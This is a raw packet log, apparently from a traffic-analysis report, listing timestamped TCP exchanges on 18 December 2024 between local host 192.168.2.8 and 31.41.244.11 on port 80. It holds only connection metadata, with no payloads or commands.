Dec 18, 2024 13:38:13.388309002 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.388330936 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.389133930 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.389199018 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.389250040 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.389285088 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.390171051 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.390212059 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.390221119 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.390258074 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.391146898 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.391184092 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.391259909 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.391298056 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.392097950 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.392138004 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.392287016 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.392324924 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.393106937 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.393142939 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.393234968 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.393274069 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.394134045 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.394171000 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.394273043 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.394310951 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.395085096 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.395123959 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.395215034 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.395251989 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.396150112 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.396188021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.396269083 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.396303892 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.397109032 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.397150993 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.397197008 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.397234917 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.398173094 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.398216963 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.398277044 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.398312092 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.399259090 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.399272919 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.399321079 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.399338961 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.400604963 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.400646925 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.400650024 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.400686979 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.401125908 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.401161909 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.401225090 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.401261091 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.402147055 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.402199030 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.402225971 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.402264118 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.403146029 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.403186083 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.403243065 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.403280973 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.404108047 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.404145956 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.404278994 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.404314995 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.405251026 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.405262947 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.405292034 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.405316114 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.406196117 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.406232119 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.406337023 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.406368971 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.407182932 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.407222986 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.407263041 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.407298088 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.408224106 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.408236980 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.408261061 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.408276081 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.409147978 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.409188032 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.409213066 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.409250021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.410186052 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.410222054 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.410253048 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.410567045 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.411112070 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.411150932 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.411251068 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.411286116 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.412122011 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.412161112 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.412302971 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.412338972 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.413129091 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.413217068 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.413278103 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.413316011 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.414181948 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.414220095 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.414254904 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.414310932 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.415112972 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.415153980 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.415206909 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.415245056 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.416307926 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.416321039 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.416363955 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.417630911 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.417788982 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.417809963 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.417850018 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.418592930 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.418605089 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.418628931 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.418647051 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.419357061 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.419397116 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.419519901 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.419554949 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.420114040 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.420154095 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.420234919 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.420274019 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.421292067 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.421329021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.421396971 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.421435118 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.422265053 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.422302008 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.422364950 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.422400951 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.423213005 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.423224926 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.423249960 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.423264027 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.424268961 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.424282074 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.424310923 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.424326897 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.425369024 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.425379992 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.425410986 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.426209927 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.426248074 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.426300049 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.426343918 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.427227974 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.427263021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.427325010 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.427356958 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.428164005 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.428206921 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.428239107 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.428277016 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.429203033 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.429239988 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.429478884 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.429514885 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.430272102 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.430284023 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.430310965 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.430330038 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.431231022 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.431269884 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.431286097 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.431320906 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.432437897 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.432478905 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.432563066 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.432621956 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.433238029 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.433273077 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.433403969 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.433448076 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.434192896 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.434247017 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.434299946 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.434335947 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.435168982 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.435208082 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.435282946 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.435321093 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.575365067 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.575449944 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.575495005 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.575539112 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.575963020 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.576001883 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.576066017 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.576106071 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.576353073 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.576391935 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.577104092 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.577141047 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.577359915 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.577410936 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.578155994 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.578197956 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.578295946 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.578340054 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.579292059 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.579304934 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.579329967 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.579350948 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.580149889 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.580188990 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.580190897 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.580221891 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.581077099 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.581115007 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.581497908 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.581543922 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.582200050 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.582212925 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.582252026 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.583065033 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.583101988 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.583169937 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.583239079 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.584088087 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.584122896 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.584203959 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.584239960 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.585098028 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.585109949 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.585139990 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.586278915 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.586316109 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.586391926 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.586429119 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.587363005 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.587408066 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.587464094 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.587502956 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.588560104 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.588601112 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.588871002 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.588912010 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.589545012 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.589560032 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.589584112 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.589601040 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.590315104 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.590329885 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.590357065 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.590373993 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.591176987 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.591217995 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.592037916 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.592077971 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.592294931 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.592310905 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.592334032 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.592350006 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.593229055 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.593241930 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.593266010 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.593283892 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.594110012 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.594151020 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.594871998 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.594913006 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.595150948 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.595190048 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.595279932 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.595323086 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.596071959 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.596115112 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.596132040 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.596170902 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.597109079 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.597122908 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.597148895 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.597167015 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.598084927 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.598123074 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.598269939 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.598309040 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.599283934 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.599296093 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.599337101 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.599354982 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.600204945 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.600217104 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.600245953 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.600260019 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.600991964 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.601031065 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.601094007 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.601130009 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.602129936 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.602143049 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.602171898 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.603141069 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.603184938 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.603355885 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.603399992 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.604365110 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.604377985 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.604406118 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.604428053 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.605206966 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.605247021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.605355024 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.605393887 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.606229067 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.606270075 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.606676102 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.606717110 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.607162952 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.607196093 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.607323885 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.607367992 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.608064890 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.608107090 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.608402967 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.608443975 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.609189034 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.609200954 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.609239101 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.610013962 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.610053062 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.610172033 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.610208988 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.611059904 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.611099958 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.611166954 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.611207008 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.612119913 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.612132072 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.612162113 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.613028049 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.613497972 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.613526106 CET	49708	80	192.168.2.8	31.41.244.11
